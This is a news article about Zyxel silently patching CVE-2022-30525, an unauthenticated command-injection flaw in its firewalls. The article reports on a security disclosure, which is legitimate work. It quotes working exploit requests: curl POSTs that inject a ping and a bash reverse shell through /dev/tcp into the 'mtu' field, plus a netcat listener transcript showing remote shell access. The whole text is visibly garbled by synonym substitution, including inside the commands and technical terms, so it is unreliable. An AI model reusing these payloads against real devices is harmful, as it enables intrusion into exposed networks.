Zyxel silently patches command-injection vulnerability with 9.8 severity rating



{Hardware} producer Zyxel quietly launched an replace fixing a crucial vulnerability that provides hackers the flexibility to regulate tens of hundreds of firewall units remotely.

The vulnerability, which permits distant command injection with no authentication required, carries a severity ranking of 9.eight out of a potential 10. It’s straightforward to use by sending easy HTTP or HTTPS requests to affected units. The requests permit hackers to ship instructions or open an internet shell interface that permits hackers to keep up privileged entry over time.

Excessive-value, straightforward to weaponize, requires no authentication

The vulnerability impacts a line of firewalls that provide a function often called zero-touch provisioning. Zyxel markets the units to be used in small department and company headquarter deployments. The units carry out VPN connectivity, SSL inspection, internet filtering, intrusion safety, and e mail safety and supply as much as 5Gbps throughput via the firewall. The Shodan machine search service exhibits greater than 16,000 affected units are uncovered to the Web.

The particular units affected are:

Affected Mannequin Affected Firmware Model
USG FLEX 100, 100W, 200, 500, 700 ZLD5.00 via ZLD5.21 Patch 1
USG20-VPN, USG20W-VPN ZLD5.10 via ZLD5.21 Patch 1
ATP 100, 200, 500, 700, 800 ZLD5.10 via ZLD5.21 Patch 1

The vulnerability is tracked as CVE-2022-30525. Rapid7, the safety agency that found it and privately reported it to Zyxel, stated that the VPN sequence of the units additionally helps ZTP, however they’re not susceptible as a result of they don’t embrace different required performance. In an advisory published Thursday, Rapid7 researcher Jake Baines wrote:

The affected fashions are susceptible to unauthenticated and distant command injection through the executive HTTP interface. Instructions are executed because the no one consumer. This vulnerability is exploited via the /ztp/cgi-bin/handler URI and is the results of passing unsanitized attacker enter into the os.system technique in lib_wan_settings.py. The susceptible performance is invoked in affiliation with the setWanPortSt command. An attacker can inject arbitrary instructions into the mtu or the knowledge parameter.

Beneath are examples of (1) curl that causes the firewall to execute a ping to IP deal with, adopted by (2) the powershell output of the outcomes, (3) the spawning of a reverse shell and (4) issues a hacker can do with the reverse shell:

    1. curl -v --insecure -X POST -H "Content material-Sort: utility/json" -d
      :"1","vlanid":"5","mtu":"; ping;","knowledge":"hello"}'
    2. no one   11040  0.0  0.2  21040  5152 ?        S    Apr10   0:00  _ /usr/native/apache/bin/httpd -f /usr/native/zyxel-gui/httpd.conf -k sleek -DSSL
      no one   16052 56.4  0.6  18104 11224 ?        S    06:16   0:02  |   _ /usr/bin/python /usr/native/zyxel-gui/htdocs/ztp/cgi-bin/handler.py
      no one   16055  0.0  0.0   3568  1492 ?        S    06:16   0:00  |       _ sh -c /usr/sbin/sdwan_iface_ipc 11 WAN3 4 ; ping; 5 >/dev/null 2>&1
      no one   16057  0.0  0.0   2152   564 ?        S    06:16   0:00  |           _ ping
    3. curl -v --insecure -X POST -H "Content material-Sort: utility/json" -d '
      "1","vlanid":"5","mtu":"; bash -c "exec bash -i &>/dev/tcp/ <&1;";","knowledge":"hello"}'
    4. albinolobster@ubuntu:~$ nc -lvnp 1270
      Listening on 1270
      Connection acquired on 37882
      bash: can not set terminal course of group (11037): Inappropriate ioctl for machine
      bash: no job management on this shell
      bash-5.1$ id
      uid=99(no one) gid=10003(shadowr) teams=99,10003(shadowr)
      bash-5.1$ uname -a
      uname -a
      Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.Zero ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux

Rapid7 has developed a module for the Metasploit exploit framework here that automates the exploitation course of.

Baines stated that Rapid7 notified Zyxel of the vulnerability on April 13 and that the 2 events agreed to supply a coordinated disclosure, together with the repair, on June 21. The researcher went on to say that unbeknownst to Rapid7, the {hardware} producer launched a firmware replace on April 28 that quietly fastened the vulnerability. Zyxel solely obtained the CVE quantity on Tuesday, after Rapid7 requested in regards to the silent patch, and printed an advisory on Thursday.

According to AttackerKB, a useful resource on safety vulnerabilities, CVE-2022-30525 is of excessive worth to risk actors as a result of it’s straightforward to weaponize, requires no authentication, and will be exploited within the default setup of susceptible units. Rapid7 representatives weren’t obtainable to reply fundamental questions in regards to the accuracy of that evaluation.

Directors should manually apply the patch except they’ve modified default settings to permit automated updating. Early indications are that the patch hasn’t been broadly deployed, as a Shodan question for simply one of many susceptible firewalls, the ATP200, confirmed that solely about 25 p.c of uncovered units had been working the most recent firmware.

Vulnerabilities affecting firewalls will be particularly extreme as a result of they sit on the outer fringe of networks the place incoming and outgoing visitors flows. Many firewalls can even learn knowledge earlier than it’s encrypted. Directors who oversee networks that use these affected units ought to prioritize investigating their publicity to this vulnerability and patch accordingly.

Source link


Please enter your comment!
Please enter your name here